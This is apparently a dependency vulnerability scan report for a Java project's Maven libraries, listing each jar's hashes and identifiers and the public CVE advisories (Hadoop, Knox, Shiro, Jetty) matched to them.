  • cpe: cpe:/a:apache:knox:0.10.0  Confidence:Highest  
  • maven: org.apache.knox:gateway-spi:0.10.0  Confidence:Highest

CVE-2017-5646  

Severity:Medium
CVSS Score: 4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N)
CWE: CWE-346 Origin Validation Error

For versions of Apache Knox from 0.2.0 to 0.11.0 - an authenticated user may use a specially crafted URL to impersonate another user while accessing WebHDFS through Apache Knox. This may result in escalated privileges and unauthorized data access. While this activity is audit logged and can be easily associated with the authenticated user, this is still a serious security issue. All users are recommended to upgrade to the Apache Knox 0.12.0 release.

Vulnerable Software & Versions: (show all)

hadoop-auth-2.2.0.jar

Description:

 Apache Hadoop Auth - Java HTTP SPNEGO

File Path: /Users/Kevin/.m2/repository/org/apache/hadoop/hadoop-auth/2.2.0/hadoop-auth-2.2.0.jar
MD5: 8bb0f03bea387738b61642a2502b3289
SHA1: 74e5f8b2134be51312c004d29e33a7bf4377ce20
SHA256:f2c50d66e049c378088975774656d8e111265d12fbba1cde97de71dd01b96d2b
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:hadoop:2.2.0  Confidence:Highest  
  • maven: org.apache.hadoop:hadoop-auth:2.2.0  Confidence:Highest

CVE-2014-0229  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Apache Hadoop 0.23.x before 0.23.11 and 2.x before 2.4.1, as used in Cloudera CDH 5.0.x before 5.0.2, do not check authorization for the (1) refreshNamenodes, (2) deleteBlockPool, and (3) shutdownDatanode HDFS admin commands, which allows remote authenticated users to cause a denial of service (DataNodes shutdown) or perform unnecessary operations by issuing a command.

Vulnerable Software & Versions: (show all)

CVE-2014-3627  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-59 Improper Link Resolution Before File Access ('Link Following')

The YARN NodeManager daemon in Apache Hadoop 0.23.0 through 0.23.11 and 2.x before 2.5.2, when using Kerberos authentication, allows remote cluster users to change the permissions of certain files to world-readable via a symlink attack in a public tar archive, which is not properly handled during localization, related to distributed cache.

Vulnerable Software & Versions: (show all)

CVE-2016-5001  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

This is an information disclosure vulnerability in Apache Hadoop before 2.6.4 and 2.7.x before 2.7.2 in the short-circuit reads feature of HDFS. A local user on an HDFS DataNode may be able to craft a block token that grants unauthorized read access to random files by guessing certain fields in the token.

Vulnerable Software & Versions: (show all)

CVE-2016-6811  

Severity:High
CVSS Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

In Apache Hadoop 2.x before 2.7.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.

Vulnerable Software & Versions: (show all)

CVE-2017-15713  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Vulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host.

Vulnerable Software & Versions: (show all)

CVE-2017-3161  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The HDFS web UI in Apache Hadoop before 2.7.0 is vulnerable to a cross-site scripting (XSS) attack through an unescaped query parameter.

Vulnerable Software & Versions:

CVE-2017-3162  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

HDFS clients interact with a servlet on the DataNode to browse the HDFS namespace. The NameNode is provided as a query parameter that is not validated in Apache Hadoop before 2.7.0.

Vulnerable Software & Versions:

javax.servlet-api-3.1.0.jar

Description:

 Java(TM) Servlet 3.1 API Design Specification

License:

CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/javax/servlet/javax.servlet-api/3.1.0/javax.servlet-api-3.1.0.jar
MD5: 79de69e9f5ed8c7fcb8342585732bbf7
SHA1: 3cd63d075497751784b2fa84be59432f4905bf7c
SHA256:af456b2dd41c4e82cf54f3e743bc678973d9fe35bd4d3071fa05c7e5333b8482
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.servlet:javax.servlet-api:3.1.0  Confidence:Highest

httpclient-4.5.1.jar

Description:

 
   Apache HttpComponents Client
  

File Path: /Users/Kevin/.m2/repository/org/apache/httpcomponents/httpclient/4.5.1/httpclient-4.5.1.jar
MD5: 53cad957821a4bacaf9e108af24e6f90
SHA1: 7e3cecc566df91338c6c67883b89ddd05a17db43
SHA256:0ba1a340188f33408632cedbe25d6fe17c1458bde17680a06cd6f6a69476ff74
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:httpclient:4.5.1  Confidence:Low  
  • maven: org.apache.httpcomponents:httpclient:4.5.1  Confidence:Highest

shiro-web-1.2.3.jar

Description:

 Apache Shiro is a powerful and flexible open-source security framework that cleanly handles        authentication, authorization, enterprise session management, single sign-on and cryptography services.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/shiro/shiro-web/1.2.3/shiro-web-1.2.3.jar
MD5: 38105101e9efde681dc1de127193f99f
SHA1: 4dbcac122a883c29d32fe94f6b1525e5a81884ec
SHA256:aec0f2185180107b25343a986baf9a4122d5d272fa7ab9721a35552f0ad12369
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.shiro:shiro-web:1.2.3  Confidence:Highest
  • cpe: cpe:/a:apache:shiro:1.2.3  Confidence:Low  

CVE-2016-4437  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.

Vulnerable Software & Versions:

commons-codec-1.7.jar

Description:

 
     The codec package contains simple encoder and decoders for
     various formats such as Base64 and Hexadecimal.  In addition to these
     widely used encoders and decoders, the codec package also maintains a
     collection of phonetic encoding utilities.
    

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-codec/commons-codec/1.7/commons-codec-1.7.jar
MD5: e47ef8e1a0c11e0e7e41704816cda890
SHA1: 9cd61d269c88f9fb0eb36cea1efcd596ab74772f
SHA256:db82a948bc070414fcfd3880ebd1205c94df5f5c61558ccbc653ec2f820bf7a4
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-codec:commons-codec:1.7  Confidence:Highest

oro-2.0.8.jar

File Path: /Users/Kevin/.m2/repository/oro/oro/2.0.8/oro-2.0.8.jar
MD5: 42e940d5d2d822f4dc04c65053e630ab
SHA1: 5592374f834645c4ae250f4c9fbb314c9369d698
SHA256:e00ccdad5df7eb43fdee44232ef64602bf63807c2d133a7be83ba09fd49af26e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: oro:oro:2.0.8  Confidence:Highest

commons-net-1.4.1.jar

License:

The Apache Software License, Version 2.0: /LICENSE.txt
File Path: /Users/Kevin/.m2/repository/commons-net/commons-net/1.4.1/commons-net-1.4.1.jar
MD5: 365c9a26e81b212de0553fbed10452cc
SHA1: abb932adb2c10790c1eaa4365d3ac2a1ac7cb700
SHA256:05a3611dedf90d0ab3e8ed83dec4ee49200148c09425437eb9348562fde7d83c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-net:commons-net:1.4.1  Confidence:Highest

cglib-2.2.2.jar

Description:

 Code generation library

License:

ASF 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/cglib/cglib/2.2.2/cglib-2.2.2.jar
MD5: b3f681be48fce094cf01a045f5bdca6f
SHA1: a47a971686474124562bdd4a7ccbd8ac8c3e8b11
SHA256:a93e4485d274277177480c4afe6ddd8355cda1cacfe356c134e25d65193935fd
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: cglib:cglib:2.2.2  Confidence:Highest

commons-digester3-3.2.jar

Description:

 
    The Apache Commons Digester package lets you configure an XML to Java
    object mapping module which triggers certain actions called rules whenever
    a particular pattern of nested XML elements is recognized.
  

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-digester3/3.2/commons-digester3-3.2.jar
MD5: 41d2c62c7aedafa7a3627794abc83f71
SHA1: c3f68c5ff25ec5204470fd8fdf4cb8feff5e8a79
SHA256:1c150e3d2df4b4237b47e28fea2079fb0da324578d5cca6a5fed2e37a62082ec
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-digester3:3.2  Confidence:Highest

commons-cli-1.2.jar

Description:

 
    Commons CLI provides a simple API for presenting, processing and validating a command line interface.
  

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-cli/commons-cli/1.2/commons-cli-1.2.jar
MD5: bfdcae1ff93f0c07d733f03bdce28c9e
SHA1: 2bf96b7aa8b611c177d329452af1dc933e14501c
SHA256:e7cd8951956d349b568b7ccfd4f5b2529a8c113e67c32b028f52ffda371259d9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-cli:commons-cli:1.2  Confidence:Highest

shrinkwrap-api-1.2.3.jar

Description:

 Client View of the ShrinkWrap Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/shrinkwrap-api/1.2.3/shrinkwrap-api-1.2.3.jar
MD5: 36ac70aabd6fd7714f49709a33ab63c8
SHA1: fbdf4de925f2afdfeed87bc9f610b83800c539fe
SHA256:0df8295ef9f3522c28e57343b784fe91bab7e2f56a7dbfefa70c29c9b313acd6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap:shrinkwrap-api:1.2.3  Confidence:Highest

shrinkwrap-spi-1.2.3.jar

Description:

 Generic Service Provider Contract of the ShrinkWrap Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/shrinkwrap-spi/1.2.3/shrinkwrap-spi-1.2.3.jar
MD5: edeabb2298579049d625e80269e2910f
SHA1: 1322387bb13a8a062d291d1289647e8c6c022bcd
SHA256:08fb20a5ac4821a9bef304c956b282bcd4dbc25a89163c9cefb84a12301f2ad8
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap:shrinkwrap-spi:1.2.3  Confidence:Highest

shrinkwrap-impl-base-1.2.3.jar

Description:

 Common Base for Implementations of the ShrinkWrap Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/shrinkwrap-impl-base/1.2.3/shrinkwrap-impl-base-1.2.3.jar
MD5: 521b07410577d096e71d0cb04d9a4fff
SHA1: 448a61e4c8c6f6fcf61ab25b04811bba23cb4888
SHA256:5d5e0a2cc72dee9b500509e074ce527048ef0918757895c95cdb9fc67f12b922
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap:shrinkwrap-impl-base:1.2.3  Confidence:Highest

shrinkwrap-descriptors-api-base-2.0.0-alpha-8.jar

Description:

 Base for Client View of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-api-base/2.0.0-alpha-8/shrinkwrap-descriptors-api-base-2.0.0-alpha-8.jar
MD5: d75df77895cd1bfb13efafbdcd74385d
SHA1: 7f446d32e508ee54201c93318c72eef2ffb87e24
SHA256:0b7fad7d58ded231614104febeb05eabd3d5e9c329a1f1f10f0af7bc7201be35
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-api-base:2.0.0-alpha-8  Confidence:Highest

shrinkwrap-descriptors-api-javaee-2.0.0-alpha-8.jar

Description:

 Client View of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-api-javaee/2.0.0-alpha-8/shrinkwrap-descriptors-api-javaee-2.0.0-alpha-8.jar
MD5: 668b04e3cd4b0fb36e1272220e52c629
SHA1: feb1bdc6adf287616efeed76684e4ce51ae9aa99
SHA256:1cc485db273b2b7f6f092f71a4506200ae50df258f9a3b69ff11b6455b962961
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-api-javaee:2.0.0-alpha-8  Confidence:Highest

shrinkwrap-descriptors-spi-2.0.0-alpha-8.jar

Description:

 Service Provider Interface of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-spi/2.0.0-alpha-8/shrinkwrap-descriptors-spi-2.0.0-alpha-8.jar
MD5: 6e306734f6043b04440c9434ab6a135d
SHA1: fca9a421a27ddf52cc255c4d360d9b7c70689d05
SHA256:bd0ec013c62f67727a0ea54326a2592ca83fac9a467ba442654c4f0dce847146
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-spi:2.0.0-alpha-8  Confidence:Highest

shrinkwrap-descriptors-impl-base-2.0.0-alpha-8.jar

Description:

 Implementation of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-impl-base/2.0.0-alpha-8/shrinkwrap-descriptors-impl-base-2.0.0-alpha-8.jar
MD5: f4c4da51805683dd9128ce88d44298cd
SHA1: 9b2017df39cb9bcf9acad21b07b473bf7862a9a6
SHA256:2ea8e7c5469c00f9062ab7860362d3343fd39ab8a6a1bc210ac6100caa13ce1c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-impl-base:2.0.0-alpha-8  Confidence:Highest

shrinkwrap-descriptors-impl-javaee-2.0.0-alpha-8.jar

Description:

 Generated Implementation of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-impl-javaee/2.0.0-alpha-8/shrinkwrap-descriptors-impl-javaee-2.0.0-alpha-8.jar
MD5: adaeb2eb248bc07138e8c0d677b47fcc
SHA1: 775ee808bcc6dbdc0b4e22dfdf5f45fe286828c7
SHA256:121194d249c6e64fc3bc54151839c0c93cfc90ceb4b735ad2addeb69e0965014
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-impl-javaee:2.0.0-alpha-8  Confidence:Highest

jericho-html-3.2.jar

Description:

 Jericho HTML Parser is a java library allowing analysis and manipulation of parts of an HTML document, including server-side tags, while reproducing verbatim any unrecognised or invalid HTML.

License:

GNU Lesser General Public License (LGPL): http://www.gnu.org/licenses/lgpl.txt
Eclipse Public License (EPL): http://www.eclipse.org/legal/epl-v10.html
File Path: /Users/Kevin/.m2/repository/net/htmlparser/jericho/jericho-html/3.2/jericho-html-3.2.jar
MD5: a8d9b91b1eac14db742d66673167f157
SHA1: b8385d9836562d75df8445db00c7e9c50459af9f
SHA256:cff62270e35f90df7e5797626c62546c1a3d6ce67ae154fc94c297e2db5a47cf
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.htmlparser.jericho:jericho-html:3.2  Confidence:Highest

zip4j-1.3.2.jar

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/lingala/zip4j/zip4j/1.3.2/zip4j-1.3.2.jar
MD5: 67577b0541256ea89d15e0edb6d2a7b8
SHA1: 4ba84e98ee017b74cb52f45962f929a221f3074c
SHA256:c67098d430c574311432728ebd4c7c45672f9ccf5c64702eb6afb8816c22ad08
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.lingala.zip4j:zip4j:1.3.2  Confidence:Highest

joda-time-2.9.2.jar

Description:

 Date and time library to replace JDK date handling

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/joda-time/joda-time/2.9.2/joda-time-2.9.2.jar
MD5: 32a794b6a820daf3fad92e59988df64c
SHA1: 36d6e77a419cb455e6fd5909f6f96b168e21e9d0
SHA256:0be5c40e8cdce9ec0643d76be99f276db17c45d7616a217fd1b19b7ef73ca7b1
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: joda-time:joda-time:2.9.2  Confidence:Highest

jetty-jndi-9.2.15.v20160210.jar

Description:

 JNDI spi impl for java namespace.

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/jetty-jndi/9.2.15.v20160210/jetty-jndi-9.2.15.v20160210.jar
MD5: cba333b9e7a94f7d5f321ad9a91e4622
SHA1: 6e09b5428a8c53d0f66fd7a20064fa7973b0cbbe
SHA256:9448eb94f331916ee58912fa7ee793ef27ec2219a7450dc52c76a1a78da51708
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:jetty:jetty:9.2.15.v20160210  Confidence:Low  
  • cpe: cpe:/a:eclipse:jetty:9.2.15.v20160210  Confidence:Low  
  • maven: org.eclipse.jetty:jetty-jndi:9.2.15.v20160210  Confidence:Highest

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions: (show all)

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions: (show all)

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions: (show all)

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

javax.annotation-api-1.2.jar

Description:

 Common Annotations for the JavaTM Platform API

License:

CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/javax/annotation/javax.annotation-api/1.2/javax.annotation-api-1.2.jar
MD5: 75fe320d2b3763bd6883ae1ede35e987
SHA1: 479c1e06db31c432330183f5cae684163f186146
SHA256:5909b396ca3a2be10d0eea32c74ef78d816e1b4ead21de1d78de1f890d033e04
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.annotation:javax.annotation-api:1.2  Confidence:Highest

jetty-schemas-3.1.M0.jar

Description:

 Administrative parent pom for Jetty modules

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/toolchain/jetty-schemas/3.1.M0/jetty-schemas-3.1.M0.jar
MD5: 163aba653172131b21223b87ce5abf29
SHA1: 6179bafb6ed2eb029862356df6713078c7874f85
SHA256:bb94452226bf103848614948c88f44d1057c2d9203d53affc1c9057a16223907
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty.toolchain:jetty-schemas:3.1.M0  Confidence:Highest

apache-el-8.0.9.M3.jar

Description:

 A rebundling of Apache Tomcat Jasper to remove the tomcat server dependencies,       so that the JSP engine can be used by the Eclipse Jetty project.

License:

http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/org/mortbay/jasper/apache-el/8.0.9.M3/apache-el-8.0.9.M3.jar
MD5: 1df9a4b4e119cd3d092c92e0f51f2dce
SHA1: 98daa71c32b7d27dd9463b36de9cebab3f2e5e2e
SHA256:e55df966c864f749becd6f9fbd896e062935650a99880438ffef7b2614d59fc5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.mortbay.jasper:apache-el:8.0.9.M3  Confidence:Highest
  • cpe: cpe:/a:apache_tomcat:apache_tomcat:8.0.9.m3  Confidence:Low  

apache-jsp-8.0.9.M3.jar

Description:

 A rebundling of Apache Tomcat Jasper to remove the tomcat server dependencies,       so that the JSP engine can be used by the Eclipse Jetty project.

License:

http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/org/mortbay/jasper/apache-jsp/8.0.9.M3/apache-jsp-8.0.9.M3.jar
MD5: 9ad2032b63ceb54659c50fd5e733391a
SHA1: 0e46309f2423c0d7321cc2a0928f4e411b82aee9
SHA256:0c154c190b7e75530e7b0b015a370343e9e5ae80550d7d1e8c12f33725df66ec
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache_tomcat:apache_tomcat:8.0.9.m3  Confidence:Low  
  • cpe: cpe:/a:jasper_project:jasper:8.0.9.m3  Confidence:Low  
  • maven: org.mortbay.jasper:apache-jsp:8.0.9.M3  Confidence:Highest

org.eclipse.jdt.core-3.8.2.v20130121.jar

Description:

 
    This artifact originates from the Eclipse Project at Eclipse, 
    it is an osgi bundle and is signed as well.  Originally:
    org.eclipse.jdt.core.compiler.batch_3.8.2.v20130121-145325
  

File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/orbit/org.eclipse.jdt.core/3.8.2.v20130121/org.eclipse.jdt.core-3.8.2.v20130121.jar
MD5: bbcc2904953263282f55ebb3b8cfbc95
SHA1: ebb04771ae21dec8682e4153e97404d9933a9c13
SHA256:fc38504b81078d4a39e4f037bf635b9183a4e313d2d23b0f7be8a21f2ac8ab98
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty.orbit:org.eclipse.jdt.core:3.8.2.v20130121  Confidence:Highest
  • cpe: cpe:/a:eclipse:jetty:3.8.2.v20130121  Confidence:Low  
  • cpe: cpe:/a:jetty:jetty:3.8.2.v20130121  Confidence:Low  

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions: (show all)

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions: (show all)

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions: (show all)

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

apache-jsp-9.2.15.v20160210.jar

Description:

 Jetty-specific ServletContainerInitializer for Jasper

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/apache-jsp/9.2.15.v20160210/apache-jsp-9.2.15.v20160210.jar
MD5: 136f4f799c49dcc361176415ebeb8992
SHA1: 8989a61eeb3e415131196a24dec8317da3ca136d
SHA256:ac352dd03ef66e63a45ca24d0c00076f0622f06b4fab73b69d1625ac53af4d5b
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:jetty:jetty:9.2.15.v20160210  Confidence:Low  
  • cpe: cpe:/a:eclipse:jetty:9.2.15.v20160210  Confidence:Low  
  • maven: org.eclipse.jetty:apache-jsp:9.2.15.v20160210  Confidence:Highest

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions: (show all)

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions: (show all)

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions: (show all)

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:

taglibs-standard-spec-1.2.1.jar

Description:

 
        An implementation of the JSP Standard Tag Library (JSTL) Specification API.
    

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/taglibs/taglibs-standard-spec/1.2.1/taglibs-standard-spec-1.2.1.jar
MD5: 5948855e1b1a8048907ce84a6cb17de8
SHA1: 32aa0d038dd1e3a4c4e8ecc3c14733c6f54bef3b
SHA256:b30b47704352230a1af056048e9185ac84f426ded3794f8fbc85494ee69579e2
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2015-0254  

